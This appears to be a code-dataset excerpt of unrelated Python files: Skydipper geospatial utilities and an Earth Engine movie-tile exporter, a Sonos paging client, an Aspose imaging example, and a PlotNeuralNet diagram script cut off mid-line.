sample the function f and g. plot : bool Display plots for debugging. Returns ------- rv : Float The radial velocity of g with respect to f. ''' # cast to numpy array shifts = np.array(shifts) cc = cross_correlate(f, g, x_range, shifts, num=num, plot=plot) return shifts[np.argmax(cc)]
2.703125
3
scripts/scratch.py
lewisjared/netcdf-scm
0
12789743
<gh_stars>0 import pdb from netcdf_scm.iris_cube_wrappers import CMIP6OutputCube test = CMIP6OutputCube() pdb.set_trace() test.load_data_in_directory( "/data/marble/cmip6/CMIP6/CMIP/NCAR/CESM2/historical/r10i1p1f1/Omon/tos/gn/v20190313/" ) test.load_data_in_directory( "tests/test-data/cmip6output/CMIP6/CMIP/NCAR/CESM2/historical/r10i1p1f1/Omon/tos/gn/v20190313" )
1.5625
2
Skydipper/utils.py
Skydipper/LMIPy
0
12789744
<reponame>Skydipper/LMIPy<filename>Skydipper/utils.py import json import math import ee from time import sleep from google.cloud import storage def html_box(item): """Returns an HTML block with template strings filled-in based on item attributes.""" is_layer = str(type(item)) == "<class 'Skydipper.layer.Layer'>" is_dataset = str(type(item)) == "<class 'Skydipper.dataset.Dataset'>" is_widget = str(type(item)) == "<class 'Skydipper.Skydipper.Widget'>" is_geometry = str(type(item)) == "<class 'Skydipper.geometry.Geometry'>" is_image = str(type(item)) == "<class 'Skydipper.image.Image'>" site_link = "<a href='https://skydipper.com/' target='_blank'>" site_logo = "<img class='itemThumbnail' src='https://skydipper.com/images/logo.png'>" if is_layer: kind_of_item = 'Layer' url_link = f'{item.server}/v1/layer/{item.id}?includes=metadata' elif is_dataset: kind_of_item = 'Dataset' url_link = f'{item.server}/v1/dataset/{item.id}?includes=metadata,layer' elif is_image: if item.type in ['Classified Image', 'Composite Image']: instrument = item.type else: instrument = item.instrument html_string = ("<div class='item_container' style='height: auto; overflow: hidden; border: 1px solid #2BA4A0;" "border-radius: 5px; background: #2BA4A0; line-height: 1.21429em; padding: 10px;''>" "<div class='item_left' style='width: 100px; height: 100px; float: left;''>" f"<a href='{item.thumb_url}' target='_blank'>" f"<img class='itemThumbnail' src='{item.thumb_url}'>" "</a></div><div class='item_right' style='float: none; width: auto; hidden;padding-left: 10px; overflow: hidden;''>" f"<b>Image Source</b>: {instrument} </br>" f"<b>Datetime</b>: {item.date_time} </br>" f"<b>Cloud score </b>: {item.cloud_score} </br>" " </div> </div>") return html_string elif is_geometry: kind_of_item = 'Geometry' url_link = f'{item.server}/v1/geostore/{item.id}' html_string = ("<div class='item_container' style='height: auto; overflow: hidden; border: 1px solid #2bA4A0;" "border-radius: 5px; background: #2bA4A0; line-height: 1.21429em; padding: 10px;''>" "<div class='item_left' style='width: 210px; float: left;''>" f"{site_link}" f"{site_logo}" "</a></div><div class='item_right' style='float: none; width: auto; hidden;padding-left: 10px; overflow: hidden;''>" f"<b>Geometry id</b>: <a href={url_link} target='_blank'>{item.id}</a></br>") for k,v in item.attributes.get('info').items(): if v and k != 'simplifyThresh': html_string += f"<br><i>{k}: {v}</i>" html_string += ("" " </div> </div>") return html_string else: kind_of_item = 'Unknown' url_link = None table_statement = f"Data source {item.attributes.get('provider')}" if item.attributes.get('connectorUrl') and item.attributes.get('provider') == "cartodb": table_statement = (f"Carto table: <a href={item.attributes.get('connectorUrl')}" " target='_blank'>" f"{item.attributes.get('tableName')}" "</a>" ) if item.attributes.get('provider') == 'gee': table_statement = (f"GEE asset: <a href='https://code.earthengine.google.com/asset='" f"{item.attributes.get('tableName')} target='_blank'>" f"{item.attributes.get('tableName')}" "</a>" ) html = ("<div class='item_container' style='height: auto; overflow: hidden; border: 1px solid #2BA4A0;" "border-radius: 2px; background: #2BA4A0; line-height: 1.21429em; padding: 10px;''>" "<div class='item_left' style='width: 210px; float: left;''>" f"{site_link}" f"{site_logo}" "</a></div><div class='item_right' style='float: none; width: auto; hidden;padding-left: 10px; overflow: hidden;''>" f"<a href={url_link} target='_blank'>" f"<b>{item.attributes.get('name')}</b>" "</a>" f"<br> {table_statement} | {kind_of_item} in {', '.join(item.attributes.get('application')).upper()}." f"<br>Last Modified: {item.attributes.get('updatedAt')}" f"<br><a href='{item.server}/v1/fields/{item.id}' target='_blank'>Fields</a>" f" Connector: {item.attributes.get('provider')}" f" | Published: {item.attributes.get('published')}" " </div> </div>") return html def show_image_collection(item, i): html_string = ("<div class='item_container' style='height: auto; overflow: hidden; border: 1px solid #2BA4A0;" "border-radius: 2px; background: #2BA4A0; line-height: 1.21429em; padding: 10px;''>" "<div class='item_left' style='width: 100px; height: 100px; hidden;padding-left: 10px; float: left''>" f"<a href='{item.get('thumb_url')}' target='_blank'>" f"<img class='itemThumbnail' src='{item.get('thumb_url')}'>" "</a></div><div class='item_right' style='float: none; hidden;padding-left: 10px; width: auto; overflow: hidden;''>" f"<b>Image Source</b>: {item.get('instrument')} </br>" f"<b>Datetime</b>: {item.get('date_time')} </br>" f"<b>Cloud score </b>: {item.get('cloud_score')} </br>" " </div> </div>") return html_string def show(item, i): """Returns an HTML block with template strings filled-in based on item attributes.""" is_layer = item.get('type') == 'Layer' is_dataset = item.get('type') == 'Dataset' server = item.get('server', "https://api.skydipper.com") item_id = item.get('id', None) attributes = item.get('attributes', None) if is_layer: kind_of_item = 'Layer' url_link = f'{server}/v1/layer/{item_id}?includes=metadata' elif is_dataset: kind_of_item = 'Dataset' url_link = f'{server}/v1/dataset/{item_id}?includes=metadata,layer' else: kind_of_item = 'Unknown' url_link = None table_statement = f"Data source {attributes.get('provider')}" if attributes.get('connectorUrl') and attributes.get('provider') == "cartodb": table_statement = (f"Carto table: <a href={attributes.get('connectorUrl')}" " target='_blank'>" f"{attributes.get('tableName')}" "</a>" ) if attributes.get('connectorUrl') and attributes.get('provider') == "csv": table_statement = (f"CSV Table: <a href={attributes.get('connectorUrl')}" " target='_blank'>" f"{attributes.get('tableName')}" "</a>" ) if attributes.get('provider') == 'gee': table_statement = (f"GEE asset: <a href='https://code.earthengine.google.com/asset='" f"{attributes.get('tableName')} target='_blank'>" f"{attributes.get('tableName')}" "</a>" ) site_link = "<a href='https://skydipper.com/' target='_blank'>" site_logo = "<img class='itemThumbnail' src='https://skydipper.com/images/logo.png'>" html = ("<div class='item_container' style='height: auto; overflow: hidden; border: 1px solid #2BA4A0;" "border-radius: 2px; background: #2BA4A0; line-height: 1.21429em; padding: 10px;''>" "<div class='item_left' style='width: 210px; float: left;''>" f"{site_link}" f"{site_logo}" "</a></div><div class='item_right' style='float: none; width: auto; hidden;padding-left: 10px; overflow: hidden;''>" f"<b>{i}. </b>" f"<a href={url_link} target='_blank'>" f"<b>{attributes.get('name')}</b>" "</a>" f"<br> {table_statement} | {kind_of_item} in {', '.join(attributes.get('application')).upper()}." f"<br>Last Modified: {attributes.get('updatedAt')}" f"<br><a href='{server}/v1/fields/{item_id}' target='_blank'>Fields</a>" f" | Connector: {attributes.get('provider')}" f" | Published: {attributes.get('published')}" " </div> </div>") return html def create_class(item): from .dataset import Dataset from .layer import Layer from .Skydipper import Widget from .image import Image if item['type'] == 'metadata': return Dataset(id_hash=item.get('attributes').get('dataset'), server = item.get('server')) if item['type'] == 'Dataset' : return Dataset(id_hash = item.get('id'), server = item.get('server')) elif item['type'] == 'Layer': return Layer(id_hash = item.get('id'), server = item.get('server')) elif item['type'] == 'Widget': return Widget(id_hash = item.get('id'), attributes=item.get('attributes'), server = item.get('server')) elif item['type'] == 'Image': return Image(**item) def flatten_list(nested_list): if len(nested_list) > 0: return [item for sublist in nested_list for item in sublist] else: return [] def get_geojson_string(geom): coords = geom.get('coordinates', None) if coords and not any(isinstance(i, list) for i in coords[0]): geom['coordinates'] = [coords] feat_col = {"type": "FeatureCollection", "features": [{"type": "Feature", "properties": {}, "geometry": geom}]} return json.dumps(feat_col) def parse_filters(filter_objects): filter_whitelist = ['connectorType', 'provider', 'status', 'published', 'protected', 'geoInfo'] return_string = '' error_string = '' if filter_objects: for k, v in filter_objects.items(): if k in filter_whitelist: return_string += f'{k}={v}&' else: error_string += f' {k},' if error_string: print(f'Unable to filter by{error_string[:-1]}.') return return_string return '' def sldDump(sldObj): """ Creates valid SldStyle string from an object. """ sld_type = sldObj.get('type', None) extended = str(sldObj.get('extended', 'false')).lower() items = sldObj.get('items', None) sld_attr = {'color': None, 'label': None, 'quantity': None, 'opacity': None} if sld_type not in ['linear', 'ramp', 'gradient', 'intervals', 'values']: print('Unable to create SldStyle. Type must be in "linear", "ramp", "gradient", "intervals", "values".') return None if items: sld_str = f'<RasterSymbolizer> <ColorMap type="{sld_type}" extended="{extended}"> ' for item in items: sld_str += f'<ColorMapEntry ' for k in sld_attr.keys(): if item.get(k, None): sld_str += f'{k}="{item[k]}" ' sld_str += '/> + ' return sld_str + "</ColorMap> </RasterSymbolizer>" def sldParse(sld_str): """ Builds a dictionary from an SldStyle string. """ sld_str = sld_str.replace("'", '"').replace('\"', '"') keys = ['color', 'label', 'quantity', 'opacity'] items = [el.strip() for el in sld_str.split('ColorMapEntry') if '<RasterSymbolizer>' not in el] sld_items = [] for i in items: tmp = {} for k in keys: v = find_between(i, f'{k}="', '"') if v: tmp[k] = v sld_items.append(tmp) return { 'type': find_between(sld_str, 'type="', '"'), 'extended': find_between(sld_str, 'extended="', '"'), 'items': sld_items } def find_between(s, first, last): try: start = s.index(first) + len(first) end = s.index(last, start) return s[start:end] except ValueError: return "" def nested_set(dic, keys, value): for key in keys[:-1]: dic = dic.setdefault(key, {}) dic[keys[-1]] = value def server_uses_widgets(server): """ Does the server currently set use Widget objects? Response gives True if it does, false if not. """ uses_widgets = ['https://api.resourcewatch.org','https://staging-api.globalforestwatch.org'] if any(server in s for s in uses_widgets): return True else: return False def tile_url(image, viz_params=None): """Create a target url for tiles from an EE image asset. e.g. im = ee.Image("LE7_TOA_1YEAR/" + year).select("B3","B2","B1") viz = {'opacity': 1, 'gain':3.5, 'bias':4, 'gamma':1.5} url = tile_url(image=im),viz_params=viz) """ if viz_params: d = image.getMapId(viz_params) else: d = image.getMapId() base_url = 'https://earthengine.googleapis.com' url = (f"https://earthengine.googleapis.com/v1alpha/{d['mapid']}/tiles/{{z}}/{{x}}/{{y}}") return url class EE_TILE_CALCS(object): """ Copyright (c) 2018 <NAME>. All rights reserved. This work is licensed under the terms of the MIT license. For a copy, see <https://opensource.org/licenses/MIT>. Refactored to Python, Vizzuality, 2020. This code will help you calculate tile bounds, intersected with a given geom, at a specified z-level. """ def __init__(self, tileSize=256): ee.Initialize() self.tileSize = tileSize self.equatorial_circumference = 40075016.686 self.origin = 2 * math.pi * 6378137 / 2.0 def zoomToScale(self, zoom): tileWidth = self.equatorial_circumference / math.pow(2, zoom) pixelWidth = tileWidth / self.tileSize return pixelWidth def scaleToZoom(self, scale): tileWidth = scale * self.tileSize zoom = math.log(self.equatorial_circumference / tileWidth) / math.log(2) return math.ceil(zoom) def pixelsToMeters(self, px, py, zoom): resolution = self.zoomToScale(zoom) x = px * resolution - self.origin y = py * resolution - self.origin return [x, y] def metersToPixels(self, x, y, zoom): resolution = zoomToScale(zoom) px = (x + self.origin) / resolution py = (y + self.origin) / resolution return px, py def degreesToTiles(self, lon, lat, zoom): tx = math.floor((lon + 180) / 360 * math.pow(2, zoom)) ty = math.floor((1 - math.log(math.tan(self.toRadians(lat)) + 1 / math.cos(self.toRadians(lat))) / math.pi) / 2 * math.pow(2, zoom)) return [tx, ty] @staticmethod def tilesToDegrees(tx, ty, zoom): lon = tx / math.pow(2, zoom) * 360 - 180 n = math.pi - 2 * math.pi * ty / math.pow(2, zoom) lat = toDegrees(math.atan(0.5 * (math.exp(n) - math.exp(-n)))) return [lon, lat] def getTilesForGeometry(self, geometry, zoom): bounds = ee.List(geometry.bounds().coordinates().get(0)) ll = bounds.get(0).getInfo() # <-- Look at making this happen server-side ur = bounds.get(2).getInfo() # <-- Look at making this happen server-side tmin = self.degreesToTiles(ll[0], ll[1], zoom) tmax = self.degreesToTiles(ur[0], ur[1], zoom) tiles = [] for tx in range(tmin[0], tmax[0] + 1): for ty in range(tmax[1], tmin[1] + 1): bounds = self.getTileBounds(tx, ty, zoom) rect = ee.Geometry.Rectangle(bounds, 'EPSG:3857', False) tiles.append(ee.Feature(rect).set({'tx': tx, 'ty': ty, 'zoom': zoom })) return ee.FeatureCollection(tiles).filterBounds(geometry) def getTilesList(self, geometry, zoom): """Returns a list of individual features, where each feature element is a tile footprint.""" bounds = ee.List(geometry.bounds().coordinates().get(0)) ll = bounds.get(0).getInfo() # <-- Look at making this happen server-side ur = bounds.get(2).getInfo() # <-- Look at making this happen server-side tmin = self.degreesToTiles(ll[0], ll[1], zoom) tmax = self.degreesToTiles(ur[0], ur[1], zoom) tiles = [] for tx in range(tmin[0], tmax[0] + 1): for ty in range(tmax[1], tmin[1] + 1): bounds = self.getTileBounds(tx, ty, zoom) rect = ee.Geometry.Rectangle(bounds, 'EPSG:3857', False) tiles.append(ee.Feature(rect).set({'tx': tx, 'ty': ty, 'zoom': zoom })) return tiles def getTileBounds(self, tx, ty, zoom, tileSize=256): """Returns a FeatureCollection object, where each feature is a tile footprint""" ty = math.pow(2, zoom) - ty - 1 # TMS -> XYZ, flip y index tmp_min = self.pixelsToMeters(tx * tileSize, ty * tileSize, zoom) tmp_max = self.pixelsToMeters((tx + 1) * tileSize, (ty + 1) * tileSize, zoom) return [tmp_min, tmp_max] @staticmethod def toRadians(degrees): return degrees * math.pi / 180 @staticmethod def toDegrees(radians): return radians * 180 / math.pi class MovieMaker(object): """ Create movie tiles for a list of bounds, to go into a GCS bucket Parameters ---------- area: ee.Geometry.Polygon() A polygon that covers the area which you want to generate tiles within. zlist: list A list of integer values of z-levels to process, e.g. z=[3] or z=[3,4,5] privatekey_path: string A string specifying the direction of a json keyfile on your local filesystem e.g. "/Users/me/.privateKeys/key_with_bucket_permissions.json" bucket_name: string A string specifying a GCS bucket (to which your private key should have access) e.g. 'skydipper_materials' folder_path: string A string specifying a folder name to create within the target bucket. e.g. 'movie-tiles/DTEST' report_status: bool Set to true if you want the program to report on the files it is generating. Beware it can get long for high z-levels. """ def __init__(self, privatekey_path, bucket_name, folder_path, area=None, zlist=None, ic=None, report_status=False): self.storage_client = storage.Client.from_service_account_json(privatekey_path) self.privatekey_path = privatekey_path self.bucket = self.storage_client.get_bucket(bucket_name) self.bucket_name = bucket_name self.folder_path = folder_path self.tiler = EE_TILE_CALCS() self.area = area self.zlist = zlist self.ic = ic self.report_status = report_status ee.Initialize() def run(self): """Main worker method""" assert type(self.zlist) == list, "the zlist must be a list to run, e.g. zlist=[2]" assert type(self.area) == ee.geometry.Geometry, "An area of type ee.geometry.Geometry must be provided to run" for zlevel in self.zlist: print(f"🧨 Calculating Z-level {zlevel}") tileset = self.tiler.getTilesList(self.area, zlevel) d = self.initial_dic_creation(tileset=tileset) # Starting dic of whatever has been burned to the bucket to_do = self.get_items_by_state(d, 'WAITING') for unprocessed in to_do: z=unprocessed[0].split('/')[-3] x=unprocessed[0].split('/')[-2] y=unprocessed[0].split('/')[-1].split('.mp4')[0] if self.report_status: print(f'{z}/{x}/{y}') try: self.movie_maker(tile=unprocessed[1].get('tile'), z=z, x=x, y=y) except (ee.EEException) as err: sleep(60 * 5) # Simple - Wait 5 mins and try assigning tasks again (this assumes the only issue ) self.movie_maker(tile=unprocessed[1].get('tile'), z=z, x=x, y=y) print("Program ended normally. Note that after the files have been generated you should run MovieMaker().reNamer()") self.reNamer() return def movie_maker(self, tile, z, x, y): """Generates a single movie tile""" g = tile.geometry() filtered = self.ic.filterBounds(g) #print(f"🗺 Exporting movie-tile to {self.bucket_name}/{self.folder_path}/{z}/{x}/{y}.mp4") exp_task = ee.batch.Export.video.toCloudStorage( collection = filtered, description = f'{z}_{x}_{y}', bucket= self.bucket_name, fileNamePrefix = f"{self.folder_path}/{z}/{x}/{y}", dimensions = [256,256], framesPerSecond = 2, region = g) exp_task.start() def reNamer(self): """Renames source files to a clean target that removes jank added by EE.""" blob_gen = self.bucket.list_blobs(prefix=self.folder_path) blobs = [blob for blob in blob_gen] print(f'Scanning target {self.bucket_name}/{self.folder_path} for files that require renaming...') for blob in blobs: tmp_name = blob.name if tmp_name[-4:] == '.mp4' and ("ee-export-video" in tmp_name): target_name = f"{tmp_name.split('ee-export-video')[0]}.mp4" if self.report_status: print(f'renaming:{tmp_name}-->{target_name}') _ = self.bucket.rename_blob(blob, target_name) def getDoneFileList(self): """Returns list of file names in a bucket/path that have already been created""" blob_gen = self.bucket.list_blobs(prefix=self.folder_path) blobs = [blob for blob in blob_gen] completed_files = [] for blob in blobs: completed_files.append(blob.name) return completed_files def getFullTargetList(self, z): """ Return a list of all files we intend to create for a specified z (int) target to cover a given ee.Geometry input area, with a folder path (string) direction appended. """ target_list = [] tmp_fc = self.tiler.getTilesForGeometry(self.area, z) tmp_info = tmp_fc.getInfo() # <---this is the point where I have the properties, I should make sure to propagate them rather then call getinfo again target_list = [f"{self.folder_path}/{item.get('properties').get('zoom')}/{item.get('properties').get('tx')}/{item.get('properties').get('ty')}.mp4" for item in tmp_info.get('features')] return sorted(target_list) def get_current_status(self): """Consult the current EE Task list to see what's what""" batch_jobs = ee.batch.Task.list() processing_list = [] processing_status = [] badness_list = [] for job in batch_jobs: state = job.state try: tmp = job.config['description'].split("_") tmp_fname = f"{self.folder_path}/{tmp[0]}/{tmp[1]}/{tmp[2]}.mp4" processing_list.append(tmp_fname) processing_status.append(state) except: badness_list.append(job) return {'processing':processing_list, 'status': processing_status, 'badness': badness_list} def get_objective_list(self, tileset): """Returns a list of target files 1:1 for the target tiles""" tmp_list = [] for tile in tileset: tmp_str = tile.__str__() zoom = json.loads(tmp_str[11:-1]).get('arguments').get('value') ty = json.loads(tmp_str[11:-1]).get('arguments').get('object').get('arguments').get('value') tx = json.loads(tmp_str[11:-1]).get('arguments').get('object').get('arguments').get('object').get('arguments').get('value') tmp_list.append(f"{self.folder_path}/{zoom}/{tx}/{ty}.mp4") return tmp_list @staticmethod def generate_master_dic(objectives, tileset): d = {} for obj, tile in zip(objectives, tileset): d[obj] = {'tile': tile, 'status': "WAITING"} return d @staticmethod def get_items_by_state(d, state="WAITING"): result = [] for i in d.items(): if (i[1].get('status') == state): result.append(i) return result def initial_dic_creation(self, tileset): objectives = self.get_objective_list(tileset) # <--- calculate target files to keep track d = self.generate_master_dic(objectives=objectives, tileset=tileset) self.reNamer() done = self.getDoneFileList() # Consult the bucket and see what files have been completed for item in done: if d.get(item, None): d[item]['status']='COMPLETED' return d
2.734375
3
client.py
sammachin/twiliopaging
1
12789745
<reponame>sammachin/twiliopaging<filename>client.py #!/usr/bin/env python import pusherclient import json from soco import SoCo from soco import SonosDiscovery import time global pusher pusher_key = '' def connect_handler(data): channel = pusher.subscribe('airpage') channel.bind('message', callback) def callback(d): data = json.loads(d) url = data['url'] sonos_devices = SonosDiscovery() ips = sonos_devices.get_speaker_ips() master = SoCo(ips[0]) masteruid = master.get_speaker_info()['uid'] for ip in ips: if not (ip == master.speaker_ip): slave = SoCo(ip) ret = slave.join(masteruid) oldvol = master.volume master.volume = 60 master.play_uri(url) playing = True while playing: if master.get_current_transport_info()['current_transport_state'] == 'STOPPED': playing = False master.volume = oldvol for ip in ips: if not (ip == master.speaker_ip): slave = SoCo(ip) slave.unjoin() pusher = pusherclient.Pusher(pusher_key) pusher.connection.bind('pusher:connection_established', connect_handler) pusher.connect() while True: time.sleep(1)
2.03125
2
Examples/Python/SDK/manipulate/PerformSeveralOperationsOnImage.py
naeem244/Aspose.Imaging-for-Cloud
0
12789746
<gh_stars>0 import common input_file = "sample1.png" input_path = common.get_path(__file__, input_file) output_file = "output.jpg" output_path = common.get_path(__file__, output_file) format = "jpg" x = 96 y = 96 newWidth = 300 newHeight = 300 rectWidth = 200 rectHeight = 200 rotateFlipMethod = "" # invoke Aspose.Imaging Cloud SDK API to perform format change operation without using cloud storage response = common.imagingApi.PostImageSaveAs_ImagingApi_0(format, newWidth, newHeight, x, y, rectWidth, rectHeight, rotateFlipMethod, file=input_path) if response.Status == 'OK': # download image from API response with open(output_path, 'wb') as f: for chunk in response.InputStream: f.write(chunk)
3.078125
3
pyexamples/outside30k.py
carhartt21/PlotNeuralNet
1
12789747
import sys import os sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) import pycore.tikz as tikz import pycore.blocks as blocks import pycore.execute as execute def create_architecture(): input = 40 base_width = 64 arch = [] arch += tikz.start() arch += tikz.image(name='image_0', file='\\input_image', to=('-3,0,0'), size=(10, 10)) arch += blocks.conv_relu(name='conv_0_0', prev='0,0,0', z_label='I', size=(input, input), n_filter=64, anchor='', conn=False) arch += tikz.short_connection(of='image_0', to='conv_0_0', anchor_of='', fill='') arch += blocks.conv_relu(name='conv_0_1', prev='conv_0_0', z_label='I/2', size=(input / 2, input / 2), n_filter=64, offset=(2, 0, 0), conn=False) arch += tikz.short_connection(of='conv_0_0', to='conv_0_1', fill='') arch += tikz.resample('conv_0_0', 'conv_0_1') arch += blocks.conv_relu(name='conv_1_0', prev='conv_0_1', z_label='I/4', size=(input / 4, input / 4), n_filter=64, offset=(1, 0, 0), conn=False) arch += tikz.short_connection(of='conv_0_1', to='conv_1_0', fill='') arch += tikz.resample('conv_0_1', 'conv_1_0') arch += tikz.pool(name='pool_0', width=2, to='conv_1_0', size=(input / 4, input / 4), offset=(1, 0, 0)) arch += tikz.short_connection(of='conv_1_0', to='pool_0', fill='') # arch += blocks.multi_conv_relu(num=3, name='conv_1', prev='conv_1_0', name_start=1, # n_filter=[64, 64, 256], size=(input / 4, input / 4), # offset=(1.5, 0, 0)) # arch += blocks.tikz.long_connection('conv_1_0', 'conv_1_3', pos=1.5, anchor_to='-northeast') arch += blocks.bottleneck(3, 'bottleneck_1', prev='pool_0', size=(input / 4, input / 4), n_filter=[64, 64, 256], offset=(1.5, 0, 0), layer_num=5) arch += blocks.bottleneck(3, 'bottleneck_2', prev='bottleneck_1_2', size=(input / 4, input / 4), n_filter=[64, 64, 256], offset=(1.5, 0, 0), layer_num=8) arch += blocks.bottleneck(3, 'bottleneck_3', prev='bottleneck_2_2', size=(input / 4, input / 4), n_filter=[64, 64, 256], offset=(1.5, 0, 0), layer_num=11) arch += blocks.bottleneck(3, 'bottleneck_4', prev='bottleneck_3_2', size=(input / 8, input / 8), n_filter=[128, 128, 512], offset=(3, 0, 0), layer_num=14) arch += blocks.bottleneck(3, 'bottleneck_7', prev='bottleneck_4_2', size=(input / 8, input / 8), n_filter=[128, 128, 512], offset=(1.5, 0, 0), conn=False, ellipsis=True, layer_num=24) arch += blocks.bottleneck(3, 'bottleneck_8', prev='bottleneck_7_2', size=(input / 16, input / 16), n_filter=[256, 256, 1024], offset=(1.5, 0, 0), pos=2, layer_num=27) arch += blocks.bottleneck(3, 'bottleneck_13', prev='bottleneck_8_2', size=(input / 16, input / 16), n_filter=[256, 256, 1024], offset=(1.5, 0, 0), pos=2, conn=False, ellipsis=True, layer_num=43) arch += blocks.bottleneck(3, 'bottleneck_14', prev='bottleneck_13_2', size=(input / 32, input / 32), n_filter=[512, 512, 2048], offset=(1.5, 0, 0), pos=3, layer_num=46) arch += blocks.bottleneck(3, 'bottleneck_16', prev='bottleneck_14_2', size=(input / 32, input / 32), layer_num=53, n_filter=[512, 512, 2048], offset=(1.5, 0, 0), pos=3, conn=False, ellipsis=True) arch += tikz.coordinate('resnet_last_dummy', of='bottleneck_16_2-east', offset=(3, 0, 0)) arch += tikz.coordinate('resnet_connection_dummy', of='resnet_last_dummy', offset=(0, 0, 6)) arch += tikz.short_connection(of='bottleneck_16_2', to='resnet_last_dummy', anchor_to='') arch += tikz.short_connection(to='resnet_connection_dummy', of='resnet_last_dummy', anchor_to='', anchor_of='') arch += tikz.pool(name='pool_1', width=2, to='bottleneck_16_2', size=(input / 4, input / 4), offset=(0, -5, 0), anchor='-center', caption='$1 \\times 1$') arch += blocks.conv_relu(name='conv_pool_1', prev='pool_1', offset=(-2.5, 0, 0), size=(input / 32, input / 32), n_filter=512, anchor='-west', conn=False, rtl=True) arch += tikz.short_connection(of='pool_1', to='conv_pool_1', anchor_of='-west', anchor_to='-east', options='pos=0.75') arch += tikz.pool(name='pool_2', width=2, to='pool_1', size=(input / 4, input / 4), offset=(0, 0, 6), anchor='-center', caption='$2 \\times 2$') arch += tikz.grid(name='grid_2', at='pool_2', steps=2) arch += blocks.conv_relu(name='conv_pool_2', prev='pool_2', offset=(-2.5, 0, 0), size=(input / 32, input / 32), n_filter=512, anchor='-west', conn=False, rtl=True) arch += tikz.short_connection(of='pool_2', to='conv_pool_2', anchor_of='-west', anchor_to='-east', options='pos=0.75') arch += tikz.pool(name='pool_3', width=2, to='pool_2', size=(input / 4, input / 4), offset=(0, 0, 6), anchor='-center', caption='$4 \\times 4$') arch += tikz.grid(name='grid_3', at='pool_3', steps=4) arch += blocks.conv_relu(name='conv_pool_3', prev='pool_3', offset=(-2.5, 0, 0), size=(input / 32, input / 32), n_filter=512, anchor='-west', conn=False, rtl=True) arch += tikz.short_connection(of='pool_3', to='conv_pool_3', anchor_of='-west', anchor_to='-east', options='pos=0.75') arch += tikz.pool(name='pool_4', width=2, to='pool_3', size=(input / 4, input / 4), offset=(0, 0, 6), anchor='-center', caption='$8 \\times 8$') arch += tikz.grid(name='grid_4', at='pool_4', steps=8) arch += blocks.conv_relu(name='conv_pool_4', prev='pool_4', offset=(-2.5, 0, 0), size=(input / 32, input / 32), n_filter=512, anchor='-west', conn=False, rtl=True) arch += tikz.short_connection(of='pool_4', to='conv_pool_4', anchor_of='-west', anchor_to='-east', options='pos=0.75') arch += blocks.conc(name='conc_1', prev='pool_2', offset=(-5, 0, 2.5), conn=False) arch += tikz.coordinate('dummy_pool_1', 'pool_1-east', (5, 0, 0)) arch += tikz.coordinate('dummy_pool_2', 'pool_2-east', (5, 0, 0)) arch += tikz.coordinate('dummy_pool_3', 'pool_3-east', (5, 0, 0)) arch += tikz.coordinate('dummy_pool_4', 'pool_4-east', (5, 0, 0)) arch += tikz.short_connection('dummy_pool_1', 'pool_1', anchor_of='', anchor_to='-east') arch += tikz.double_connection('dummy_pool_1', 'dummy_pool_2', 'pool_2', anchor_of='', anchor_to='-east') arch += tikz.double_connection('dummy_pool_2', 'dummy_pool_3', 'pool_3', anchor_of='', anchor_to='-east') arch += tikz.double_connection('dummy_pool_3', 'dummy_pool_4', 'pool_4', anchor_of='', anchor_to='-east') arch += tikz.z_connection(of='resnet_last_dummy', to='dummy_pool_1', anchor_to='', shift=(6, 0, 0), anchor_of='') # arch += tikz.z_connection(of='conv_5_0_1', to='pool_2', anchor_of='-anchor', anchor_to='-east', shift=(-1, -1.5, 2)) # arch += tikz.short_connection(of='conv_5_0_1', to='pool_3', anchor_of='-west', anchor_to='-south') # arch += tikz.z_connection(of='conv_5_0_1', to='pool_4', anchor_of='-west', anchor_to='-north', shift=(0, 0, 0)) arch += tikz.z_connection('conv_pool_1', 'conc_1', anchor_of='-west', anchor_to='-northeast', shift=(-2, 0, 0)) arch += tikz.z_connection('conv_pool_2', 'conc_1', anchor_of='-west', anchor_to='-east', shift=(0, 0, 0)) arch += tikz.z_connection('conv_pool_3', 'conc_1', anchor_of='-west', anchor_to='-southeast', shift=(-0, 0, 0)) arch += tikz.z_connection('conv_pool_4', 'conc_1', anchor_of='-west', anchor_to='-southwest', shift=(-2, 0, 0)) arch += tikz.z_connection('resnet_connection_dummy', 'conc_1', anchor_of='', anchor_to='-northwest', shift=(-4.5, 0, 0)) arch += blocks.conv_relu(name='conv_60', prev='conc_1', offset=(-2.5, 0, 0), size=(input / 32, input / 32), n_filter=512, anchor='-west', conn=False) arch += tikz.short_connection(of='conc_1', to='conv_60', anchor_of='-west', anchor_to='-east', options='pos=0.75') arch += blocks.conv_relu(name='conv_60', prev='conc_1', offset=(-2.5, 0, 0), size=(input / 32, input / 32), n_filter=512, anchor='-west', conn=False, rtl=True) arch += tikz.z_conv_relu(name='conv_61', to='bottleneck_14_connection', offset=(0, 0, 8), size=(input / 16, input / 16), n_filter=512) arch += tikz.short_connection('bottleneck_14_connection', 'conv_61', anchor_of='', anchor_to='-far') arch += blocks.sum(name='sum_1', prev='conv_60', offset=(-3, 2, 0), conn=False, ) arch += tikz.short_connection('conv_61', 'sum_1', anchor_of='-near', anchor_to='-northeast') arch += blocks.upsample(name='up_1', prev='sum_1', offset=(-2.5, 0, 0), size=(input / 16, input / 16), n_filter=512, anchor='-west', anchor_of='-west', conn=True) arch += blocks.conv_relu(name='conv_62', prev='conv_60', offset=(-5, 0, 9.4), size=(input / 16, input / 16), n_filter=512, anchor='-west', conn=False, rtl=True) arch += tikz.z_connection(of='conv_60', to='sum_1', anchor_of='-farwest', anchor_to='-east', shift=(-0.3,0,-5)) arch += tikz.z_conv_relu(name='conv_63', to='bottleneck_8_connection', offset=(0, 0, 8), size=(input / 8, input / 8), n_filter=512) arch += tikz.short_connection('bottleneck_8_connection', 'conv_63', anchor_of='', anchor_to='-far') arch += blocks.sum(name='sum_2', prev='up_1', offset=(-3, 0, 0), conn=False) arch += tikz.short_connection('conv_63', 'sum_2', anchor_of='-near', anchor_to='-northeast') arch += tikz.short_connection('up_1', 'sum_2', anchor_of='-west', anchor_to='-east') arch += blocks.upsample(name='up_2', prev='sum_2', offset=(-2.5, 0, 0), size=(input / 8, input / 8), n_filter=512, anchor='-west', anchor_of='-west') arch += tikz.z_conv_relu(name='conv_64', to='up_1-south', offset=(-0.2, 0, 5), size=(input / 8, input / 8), n_filter=512) arch += tikz.short_connection(of='up_1', to='conv_64', anchor_of='-nearsouthwest', anchor_to='-far') arch += tikz.z_conv_relu(name='conv_65', to='bottleneck_4_connection', offset=(-0.25, 0, 10), size=(input / 4, input / 4), n_filter=512) arch += tikz.short_connection('bottleneck_4_connection', 